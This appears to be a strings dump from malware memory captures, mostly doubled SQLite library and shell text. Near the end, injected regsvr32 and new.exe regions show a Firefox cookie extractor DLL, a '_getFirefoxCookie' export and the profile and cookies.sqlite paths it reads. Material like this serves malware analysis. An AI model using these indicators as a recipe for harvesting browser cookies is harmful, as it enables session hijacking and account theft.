Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)

Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)

%d of %d pages missing from overflow list starting at %d

%d of %d pages missing from overflow list starting at %d

failed to get page %d

failed to get page %d

freelist leaf count too big on page %d

freelist leaf count too big on page %d

Page %d:

Page %d:

unable to get the page. error code=%d

unable to get the page. error code=%d

btreeInitPage() returns error code %d

btreeInitPage() returns error code %d

On tree page %d cell %d:

On tree page %d cell %d:

On page %d at right child:

On page %d at right child:

Corruption detected in cell %d on page %d

Corruption detected in cell %d on page %d

Multiple uses for byte %d of page %d

Multiple uses for byte %d of page %d

Fragmentation of %d bytes reported as %d on page %d

Fragmentation of %d bytes reported as %d on page %d

Page %d is never used

Page %d is never used

Pointer map page %d is referenced

Pointer map page %d is referenced

Outstanding page count goes from %d to %d during this analysis

Outstanding page count goes from %d to %d during this analysis

unknown database %s

unknown database %s

keyinfo(%d

keyinfo(%d

%s(%d)

%s(%d)

%s-mjXXXXXX9XXz

%s-mjXXXXXX9XXz

MJ delete: %s

MJ delete: %s

MJ collide: %s

MJ collide: %s

-mjX9X

-mjX9X

foreign key constraint failed

foreign key constraint failed

unable to use function %s in the requested context

unable to use function %s in the requested context

bind on a busy prepared statement: [%s]

bind on a busy prepared statement: [%s]

zeroblob(%d)

zeroblob(%d)

abort at %d in [%s]: %s

abort at %d in [%s]: %s

constraint failed at %d in [%s]

constraint failed at %d in [%s]

cannot open savepoint - SQL statements in progress

cannot open savepoint - SQL statements in progress

no such savepoint: %s

no such savepoint: %s

cannot release savepoint - SQL statements in progress

cannot release savepoint - SQL statements in progress

cannot commit transaction - SQL statements in progress

cannot commit transaction - SQL statements in progress

sqlite_temp_master

sqlite_temp_master

sqlite_master

sqlite_master

SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid

SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid

cannot change %s wal mode from within a transaction

cannot change %s wal mode from within a transaction

database table is locked: %s

database table is locked: %s

statement aborts at %d: [%s] %s

statement aborts at %d: [%s] %s

cannot open value of type %s

cannot open value of type %s

cannot open virtual table: %s

cannot open virtual table: %s

cannot open view: %s

cannot open view: %s

no such column: "%s"

no such column: "%s"

foreign key

foreign key

indexed

indexed

cannot open %s column for writing

cannot open %s column for writing

misuse of aliased aggregate %s

misuse of aliased aggregate %s

%s: %s.%s.%s

%s: %s.%s.%s

%s: %s.%s

%s: %s.%s

%s: %s

%s: %s

not authorized to use function: %s

not authorized to use function: %s

%r %s BY term out of range - should be between 1 and %d

%r %s BY term out of range - should be between 1 and %d

too many terms in %s BY clause

too many terms in %s BY clause

Expression tree is too large (maximum depth %d)

Expression tree is too large (maximum depth %d)

variable number must be between ?1 and ?%d

variable number must be between ?1 and ?%d

too many SQL variables

too many SQL variables

too many columns in %s

too many columns in %s

EXECUTE %s%s SUBQUERY %d

EXECUTE %s%s SUBQUERY %d

misuse of aggregate: %s()

misuse of aggregate: %s()

%.*s"%w"%s

%.*s"%w"%s

%s%.*s"%w"

%s%.*s"%w"

sqlite_rename_table

sqlite_rename_table

sqlite_rename_trigger

sqlite_rename_trigger

sqlite_rename_parent

sqlite_rename_parent

%s OR name=%Q

%s OR name=%Q

type='trigger' AND (%s)

type='trigger' AND (%s)

sqlite_

sqlite_

table %s may not be altered

table %s may not be altered

there is already another table or index with this name: %s

there is already another table or index with this name: %s

view %s may not be altered

view %s may not be altered

UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;

UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;

sqlite_sequence

sqlite_sequence

UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q

UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q

UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');

UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');

UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;

UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;

Cannot add a PRIMARY KEY column

Cannot add a PRIMARY KEY column

UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q

UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q

sqlite_altertab_%s

sqlite_altertab_%s

sqlite_stat1

sqlite_stat1

CREATE TABLE %Q.%s(%s)

CREATE TABLE %Q.%s(%s)

DELETE FROM %Q.%s WHERE %s=%Q

DELETE FROM %Q.%s WHERE %s=%Q

SELECT tbl,idx,stat FROM %Q.sqlite_stat1

SELECT tbl,idx,stat FROM %Q.sqlite_stat1

invalid name: "%s"

invalid name: "%s"

too many attached databases - max %d

too many attached databases - max %d

database %s is already in use

database %s is already in use

unable to open database: %s

unable to open database: %s

no such database: %s

no such database: %s

cannot detach database %s

cannot detach database %s

database %s is locked

database %s is locked

sqlite_detach

sqlite_detach

sqlite_attach

sqlite_attach

%s %T cannot reference objects in database %s

%s %T cannot reference objects in database %s

access to %s.%s.%s is prohibited

access to %s.%s.%s is prohibited

access to %s.%s is prohibited

access to %s.%s is prohibited

object name reserved for internal use: %s

object name reserved for internal use: %s

there is already an index named %s

there is already an index named %s

too many columns on %s

too many columns on %s

duplicate column name: %s

duplicate column name: %s

default value of column [%s] is not constant

default value of column [%s] is not constant

table "%s" has more than one primary key

table "%s" has more than one primary key

AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY

AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY

no such collation sequence: %s

no such collation sequence: %s

CREATE %s %.*s

CREATE %s %.*s

UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d

UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d

CREATE TABLE %Q.sqlite_sequence(name,seq)

CREATE TABLE %Q.sqlite_sequence(name,seq)

view %s is circularly defined

view %s is circularly defined

UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d

UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d

sqlite_stat%d

sqlite_stat%d

DELETE FROM %Q.sqlite_sequence WHERE name=%Q

DELETE FROM %Q.sqlite_sequence WHERE name=%Q

DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'

DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'

sqlite_stat

sqlite_stat

table %s may not be dropped

table %s may not be dropped

use DROP TABLE to delete table %s

use DROP TABLE to delete table %s

use DROP VIEW to delete view %s

use DROP VIEW to delete view %s

foreign key on %s should reference only one column of table %T

foreign key on %s should reference only one column of table %T

number of columns in foreign key does not match the number of columns in the referenced table

number of columns in foreign key does not match the number of columns in the referenced table

unknown column "%s" in foreign key definition

unknown column "%s" in foreign key definition

indexed columns are not unique

indexed columns are not unique

table %s may not be indexed

table %s may not be indexed

views may not be indexed

views may not be indexed

virtual tables may not be indexed

virtual tables may not be indexed

there is already a table named %s

there is already a table named %s

index %s already exists

index %s already exists

sqlite_autoindex_%s_%d

sqlite_autoindex_%s_%d

table %s has no column named %s

table %s has no column named %s

CREATE%s INDEX %.*s

CREATE%s INDEX %.*s

INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);

INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);

no such index: %S

no such index: %S

index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped

index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped

DELETE FROM %Q.%s WHERE name=%Q AND type='index'

DELETE FROM %Q.%s WHERE name=%Q AND type='index'

a JOIN clause is required before %s

a JOIN clause is required before %s

unable to identify the object to be reindexed

unable to identify the object to be reindexed

table %s may not be modified

table %s may not be modified

cannot modify %s because it is a view

cannot modify %s because it is a view

sqlite_version

sqlite_version

sqlite_source_id

sqlite_source_id

sqlite_log

sqlite_log

sqlite_compileoption_used

sqlite_compileoption_used

sqlite_compileoption_get

sqlite_compileoption_get

foreign key mismatch

foreign key mismatch

table %S has %d columns but %d values were supplied

table %S has %d columns but %d values were supplied

%d values for %d columns

%d values for %d columns

table %S has no column named %s

table %S has no column named %s

%s.%s may not be NULL

%s.%s may not be NULL

constraint %s failed

constraint %s failed

PRIMARY KEY must be unique

PRIMARY KEY must be unique

sqlite3_extension_init

sqlite3_extension_init

unable to open shared library [%s]

unable to open shared library [%s]

no entry point [%s] in shared library [%s]

no entry point [%s] in shared library [%s]

error during initialization: %s

error during initialization: %s

automatic extension loading failed: %s

automatic extension loading failed: %s

foreign_keys

foreign_keys

foreign_key_list

foreign_key_list

*** in database %s ***

*** in database %s ***

unsupported encoding: %s

unsupported encoding: %s

malformed database schema (%s)

malformed database schema (%s)

%s - %s

%s - %s

unsupported file format

unsupported file format

SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid

SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid

database schema is locked: %s

database schema is locked: %s

unknown or unsupported join type: %T %T%s%T

unknown or unsupported join type: %T %T%s%T

RIGHT and FULL OUTER JOINs are not currently supported

RIGHT and FULL OUTER JOINs are not currently supported

a NATURAL join may not have an ON or USING clause

a NATURAL join may not have an ON or USING clause

cannot have both ON and USING clauses in the same join

cannot have both ON and USING clauses in the same join

cannot join using column %s - column not present in both tables

cannot join using column %s - column not present in both tables

USE TEMP B-TREE FOR %s

USE TEMP B-TREE FOR %s

COMPOUND SUBQUERIES %d AND %d %s(%s)

COMPOUND SUBQUERIES %d AND %d %s(%s)

%s.%s

%s.%s

%s:%d

%s:%d

ORDER BY clause should come after %s not before

ORDER BY clause should come after %s not before

LIMIT clause should come after %s not before

LIMIT clause should come after %s not before

SELECTs to the left and right of %s do not have the same number of result columns

SELECTs to the left and right of %s do not have the same number of result columns

no such index: %s

no such index: %s

sqlite_subquery_%p_

sqlite_subquery_%p_

no such table: %s

no such table: %s

SCAN TABLE %s %s%s(~%d rows)

SCAN TABLE %s %s%s(~%d rows)

sqlite3_get_table() called with two or more incompatible queries

sqlite3_get_table() called with two or more incompatible queries

cannot create %s trigger on view: %S

cannot create %s trigger on view: %S

cannot create INSTEAD OF trigger on table: %S

cannot create INSTEAD OF trigger on table: %S

INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')

INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')

no such trigger: %S

no such trigger: %S

-- TRIGGER %s

-- TRIGGER %s

no such column: %s

no such column: %s

cannot VACUUM - SQL statements in progress

cannot VACUUM - SQL statements in progress

PRAGMA vacuum_db.synchronous=OFF

PRAGMA vacuum_db.synchronous=OFF

SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'

SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'

SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'

SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';

INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)

INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)

UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d

UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d

vtable constructor failed: %s

vtable constructor failed: %s

vtable constructor did not declare schema: %s

vtable constructor did not declare schema: %s

no such module: %s

no such module: %s

table %s: xBestIndex returned an invalid plan

table %s: xBestIndex returned an invalid plan

%s SUBQUERY %d

%s SUBQUERY %d

%s TABLE %s

%s TABLE %s

%s AS %s

%s AS %s

%s USING %s%sINDEX%s%s%s

%s USING %s%sINDEX%s%s%s

%s USING INTEGER PRIMARY KEY

%s USING INTEGER PRIMARY KEY

%s (rowid=?)

%s (rowid=?)

%s (rowid>? AND rowid)

%s (rowid>? AND rowid)

%s (rowid>?)

%s (rowid>?)

%s (rowid)

%s (rowid)

%s VIRTUAL TABLE INDEX %d:%s

%s VIRTUAL TABLE INDEX %d:%s

%s (~%lld rows)

%s (~%lld rows)

at most %d tables in a join

at most %d tables in a join

cannot use index: %s

cannot use index: %s

the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers

the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers

the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers

the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers

unable to close due to unfinished backup operation

unable to close due to unfinished backup operation

SQL logic error or missing database

SQL logic error or missing database

unknown operation

unknown operation

large file support is disabled

large file support is disabled

unknown database: %s

unknown database: %s

no such %s mode: %s

no such %s mode: %s

%s mode not allowed: %s

%s mode not allowed: %s

no such vfs: %s

no such vfs: %s

database corruption at line %d of [%.10s]

database corruption at line %d of [%.10s]

misuse at line %d of [%.10s]

misuse at line %d of [%.10s]

cannot open file at line %d of [%.10s]

cannot open file at line %d of [%.10s]

CPU Time: user %f sys %f

CPU Time: user %f sys %f

(%d) %s

(%d) %s

%*s = %s

%*s = %s

%-*.*s%s

%-*.*s%s

INSERT INTO %s VALUES(

INSERT INTO %s VALUES(

%sNULL

%sNULL

/**** ERROR: (%d) %s *****/

/**** ERROR: (%d) %s *****/

Memory Used: %d (max %d) bytes

Memory Used: %d (max %d) bytes

Number of Outstanding Allocations: %d (max %d)

Number of Outstanding Allocations: %d (max %d)

Number of Pcache Overflow Bytes: %d (max %d) bytes

Number of Pcache Overflow Bytes: %d (max %d) bytes

Number of Scratch Overflow Bytes: %d (max %d) bytes

Number of Scratch Overflow Bytes: %d (max %d) bytes

Largest Allocation: %d bytes

Largest Allocation: %d bytes

Largest Pcache Allocation: %d bytes

Largest Pcache Allocation: %d bytes

Largest Scratch Allocation: %d bytes

Largest Scratch Allocation: %d bytes

Lookaside Slots Used: %d (max %d)

Lookaside Slots Used: %d (max %d)

Successful lookaside attempts: %d

Successful lookaside attempts: %d

Lookaside failures due to size: %d

Lookaside failures due to size: %d

Lookaside failures due to OOM: %d

Lookaside failures due to OOM: %d

Pager Heap Usage: %d bytes

Pager Heap Usage: %d bytes

Page cache hits: %d

Page cache hits: %d

Page cache misses: %d

Page cache misses: %d

Page cache writes: %d

Page cache writes: %d

Schema Heap Usage: %d bytes

Schema Heap Usage: %d bytes

Statement Heap/Lookaside Usage: %d bytes

Statement Heap/Lookaside Usage: %d bytes

Fullscan Steps: %d

Fullscan Steps: %d

Sort Operations: %d

Sort Operations: %d

Autoindex Inserts: %d

Autoindex Inserts: %d

DELETE FROM sqlite_sequence;

DELETE FROM sqlite_sequence;

ANALYZE sqlite_master;

ANALYZE sqlite_master;

INSERT INTO sqlite_master(type,name,tbl_name,rootpage,sql)VALUES('table','%q','%q',0,'%q');

INSERT INTO sqlite_master(type,name,tbl_name,rootpage,sql)VALUES('table','%q','%q',0,'%q');

/****** %s ******/

/****** %s ******/

%s ORDER BY rowid DESC

%s ORDER BY rowid DESC

/****** ERROR: %s ******/

/****** ERROR: %s ******/

.backup ?DB? FILE Backup DB (default "main") to FILE

.backup ?DB? FILE Backup DB (default "main") to FILE

.bail ON|OFF Stop after hitting an error. Default OFF

.bail ON|OFF Stop after hitting an error. Default OFF

.databases List names and files of attached databases

.databases List names and files of attached databases

.dump ?TABLE? ... Dump the database in an SQL text format

.dump ?TABLE? ... Dump the database in an SQL text format

.echo ON|OFF Turn command echo on or off

.echo ON|OFF Turn command echo on or off

.exit Exit this program

.exit Exit this program

.explain ?ON|OFF? Turn output mode suitable for EXPLAIN on or off.

.explain ?ON|OFF? Turn output mode suitable for EXPLAIN on or off.

.header(s) ON|OFF Turn display of headers on or off

.header(s) ON|OFF Turn display of headers on or off

.help Show this message

.help Show this message

.import FILE TABLE Import data from FILE into TABLE

.import FILE TABLE Import data from FILE into TABLE

.indices ?TABLE? Show names of all indices

.indices ?TABLE? Show names of all indices

.load FILE ?ENTRY? Load an extension library

.load FILE ?ENTRY? Load an extension library

.log FILE|off Turn logging on or off. FILE can be stderr/stdout

.log FILE|off Turn logging on or off. FILE can be stderr/stdout

.mode MODE ?TABLE? Set output mode where MODE is one of:

.mode MODE ?TABLE? Set output mode where MODE is one of:

column Left-aligned columns. (See .width)

column Left-aligned columns. (See .width)

insert SQL insert statements for TABLE

insert SQL insert statements for TABLE

list Values delimited by .separator string

list Values delimited by .separator string

.nullvalue STRING Print STRING in place of NULL values

.nullvalue STRING Print STRING in place of NULL values

.output FILENAME Send output to FILENAME

.output FILENAME Send output to FILENAME

.output stdout Send output to the screen

.output stdout Send output to the screen

.prompt MAIN CONTINUE Replace the standard prompts

.prompt MAIN CONTINUE Replace the standard prompts

.quit Exit this program

.quit Exit this program

.read FILENAME Execute SQL in FILENAME

.read FILENAME Execute SQL in FILENAME

.restore ?DB? FILE Restore content of DB (default "main") from FILE

.restore ?DB? FILE Restore content of DB (default "main") from FILE

.schema ?TABLE? Show the CREATE statements

.schema ?TABLE? Show the CREATE statements

.separator STRING Change separator used by output mode and .import

.separator STRING Change separator used by output mode and .import

.show Show the current values for various settings

.show Show the current values for various settings

.stats ON|OFF Turn stats on or off

.stats ON|OFF Turn stats on or off

.tables ?TABLE? List names of tables

.tables ?TABLE? List names of tables

.timeout MS Try opening locked tables for MS milliseconds

.timeout MS Try opening locked tables for MS milliseconds

.trace FILE|off Output each SQL statement as it is run

.trace FILE|off Output each SQL statement as it is run

.vfsname ?AUX? Print the name of the VFS stack

.vfsname ?AUX? Print the name of the VFS stack

.width NUM1 NUM2 ... Set column widths for "column" mode

.width NUM1 NUM2 ... Set column widths for "column" mode

.timer ON|OFF Turn the CPU timer measurement on or off

.timer ON|OFF Turn the CPU timer measurement on or off

Error: unable to open database "%s": %s

Error: unable to open database "%s": %s

Error: cannot open "%s"

Error: cannot open "%s"

Error: %s

Error: %s

PRAGMA foreign_keys=OFF;

PRAGMA foreign_keys=OFF;

SELECT name, type, sql FROM sqlite_master WHERE sql NOT NULL AND type=='table' AND name!='sqlite_sequence'

SELECT name, type, sql FROM sqlite_master WHERE sql NOT NULL AND type=='table' AND name!='sqlite_sequence'

SELECT name, type, sql FROM sqlite_master WHERE name=='sqlite_sequence'

SELECT name, type, sql FROM sqlite_master WHERE name=='sqlite_sequence'

SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view')

SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view')

SELECT name, type, sql FROM sqlite_master WHERE tbl_name LIKE shellstatic() AND type=='table' AND sql NOT NULL

SELECT name, type, sql FROM sqlite_master WHERE tbl_name LIKE shellstatic() AND type=='table' AND sql NOT NULL

SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view') AND tbl_name LIKE shellstatic()

SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view') AND tbl_name LIKE shellstatic()

import

import

Error: non-null separator required for import

Error: non-null separator required for import

SELECT * FROM %s

SELECT * FROM %s

INSERT INTO %s VALUES(?

INSERT INTO %s VALUES(?

Error: %s line %d: expected %d columns of data but found %d

Error: %s line %d: expected %d columns of data but found %d

SELECT name FROM sqlite_master WHERE type='index' AND name NOT LIKE 'sqlite_%' UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' ORDER BY 1

SELECT name FROM sqlite_master WHERE type='index' AND name NOT LIKE 'sqlite_%' UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' ORDER BY 1

SELECT name FROM sqlite_master WHERE type='index' AND tbl_name LIKE shellstatic() UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' AND tbl_name LIKE shellstatic() ORDER BY 1

SELECT name FROM sqlite_master WHERE type='index' AND tbl_name LIKE shellstatic() UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' AND tbl_name LIKE shellstatic() ORDER BY 1

Error: querying sqlite_master and sqlite_temp_master

Error: querying sqlite_master and sqlite_temp_master

Error: invalid arguments: "%s". Enter ".help" for help

Error: invalid arguments: "%s". Enter ".help" for help

Error: cannot open pipe "%s"

Error: cannot open pipe "%s"

Error: cannot write to "%s"

Error: cannot write to "%s"

CREATE TABLE sqlite_master (

CREATE TABLE sqlite_master (

CREATE TEMP TABLE sqlite_temp_master (

CREATE TEMP TABLE sqlite_temp_master (

SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE lower(tbl_name) LIKE shellstatic() AND type!='meta' AND sql NOTNULL ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END

SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE lower(tbl_name) LIKE shellstatic() AND type!='meta' AND sql NOTNULL ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END

SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE type!='meta' AND sql NOTNULL AND name NOT LIKE 'sqlite_%'ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END

SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE type!='meta' AND sql NOTNULL AND name NOT LIKE 'sqlite_%'ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END

%9.9s: %s

%9.9s: %s

SELECT name FROM sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1

SELECT name FROM sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1

%z UNION ALL SELECT 'temp.' || name FROM sqlite_temp_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1

%z UNION ALL SELECT 'temp.' || name FROM sqlite_temp_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1

%z UNION ALL SELECT '%q.' || name FROM "%w".sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1

%z UNION ALL SELECT '%q.' || name FROM "%w".sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1

%s%-*s

%s%-*s

iskeyword

iskeyword

ambiguous option name: "%s"

ambiguous option name: "%s"

Error: invalid testctrl option: %s

Error: invalid testctrl option: %s

%d (0xx)

%d (0xx)

Error: testctrl %s takes a single int option

Error: testctrl %s takes a single int option

Error: testctrl %s takes no options

Error: testctrl %s takes no options

Error: testctrl %s takes a single unsigned int option

Error: testctrl %s takes a single unsigned int option

Error: CLI support for testctrl %s not implemented

Error: CLI support for testctrl %s not implemented

SQLite %s %s

SQLite %s %s

Error: unknown command or invalid arguments: "%s". Enter ".help" for help

Error: unknown command or invalid arguments: "%s". Enter ".help" for help

Error: near line %d:

Error: near line %d:

%s %s

%s %s

Error: incomplete SQL: %s

Error: incomplete SQL: %s

%s: Error: cannot locate your home directory

%s: Error: cannot locate your home directory

%s/.sqliterc

%s/.sqliterc

-- Loading resources from %s

-- Loading resources from %s

Usage: %s [OPTIONS] FILENAME [SQL]

Usage: %s [OPTIONS] FILENAME [SQL]

FILENAME is the name of an SQLite database. A new database is created

FILENAME is the name of an SQLite database. A new database is created

sqlite>

sqlite>

SQLite header and source version mismatch

SQLite header and source version mismatch

no such VFS: "%s"

no such VFS: "%s"

%s: Error: too many options: "%s"

%s: Error: too many options: "%s"

%s: Error: missing argument for option: %s

%s: Error: missing argument for option: %s

Error: unable to process SQL "%s"

Error: unable to process SQL "%s"

%s: Error: unknown option: %s

%s: Error: unknown option: %s

%s/.sqlite_history

%s/.sqlite_history

SQLite version %s %.19s

SQLite version %s %.19s

Enter ".help" for instructions

Enter ".help" for instructions

Enter SQL statements terminated with a ";"

Enter SQL statements terminated with a ";"

zcÁ

zcÁ

%System%\regsvr32.exe

%System%\regsvr32.exe

GetCPInfo

GetCPInfo

]

]

.text

.text

`.rdata

`.rdata

@.data

@.data

.reloc

.reloc

KERNEL32.DLL

KERNEL32.DLL

ole32.dll

ole32.dll

ffcookieextractor.dll

ffcookieextractor.dll

_getFirefoxCookie

_getFirefoxCookie

mscoree.dll

mscoree.dll

nKERNEL32.DLL

nKERNEL32.DLL

- Attempt to initialize the CRT more than once.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- CRT not initialized

- floating point support not loaded

- floating point support not loaded

WUSER32.DLL

WUSER32.DLL

888816666554443

888816666554443

6666554443

6666554443

!6666554443

!6666554443

%AppData%\Mozilla\Firefox

%AppData%\Mozilla\Firefox

\profiles.ini

\profiles.ini

\cookies.sqlite

\cookies.sqlite

Kernel32.dll

Kernel32.dll

regsvr32.exe_3384_rwx_01000000_00005000:

.text

.text

`.data

`.data

.rsrc

.rsrc

msvcrt.dll

msvcrt.dll

ADVAPI32.dll

ADVAPI32.dll

KERNEL32.dll

KERNEL32.dll

NTDLL.DLL

NTDLL.DLL

USER32.dll

USER32.dll

ole32.dll

ole32.dll

regsvr32.pdb

regsvr32.pdb

_wcmdln

_wcmdln

RegCloseKey

RegCloseKey

RegOpenKeyExW

RegOpenKeyExW

Excessive # of DLL's on cmdline

Excessive # of DLL's on cmdline

5.1.2600.5512 (xpsp.080413-2105)

5.1.2600.5512 (xpsp.080413-2105)

REGSVR32.EXE

REGSVR32.EXE

Windows

Windows

Operating System

Operating System

5.1.2600.5512

5.1.2600.5512

Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname

Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname

Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall

Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall

Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.

Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.

LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.

LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.

%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.

%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.

OleUninitialize failed.["%1" is not an executable file and no registration

OleUninitialize failed.["%1" is not an executable file and no registration

new.exe_3664_rwx_00130000_00047000:

.text

.text

`.data

`.data

.reloc

.reloc

update.exe

update.exe

config.bin

config.bin

%0&!%F

%0&!%F

?)500>(8

?)500>(8

7-52&

7-52&

,%)4.5(";$2

,%)4.5(";$2

:'$!71689/

:'$!71689/

-0=).?,7

-0=).?,7

60/)4:5

60/)4:5

-*?)2

-*?)2

>5;(4-2>)4 }744

>5;(4-2>)4 }744

"?5&"5%3%/

"?5&"5%3%/

398>7="'

398>7="'

;!)5:. =##

;!)5:. =##
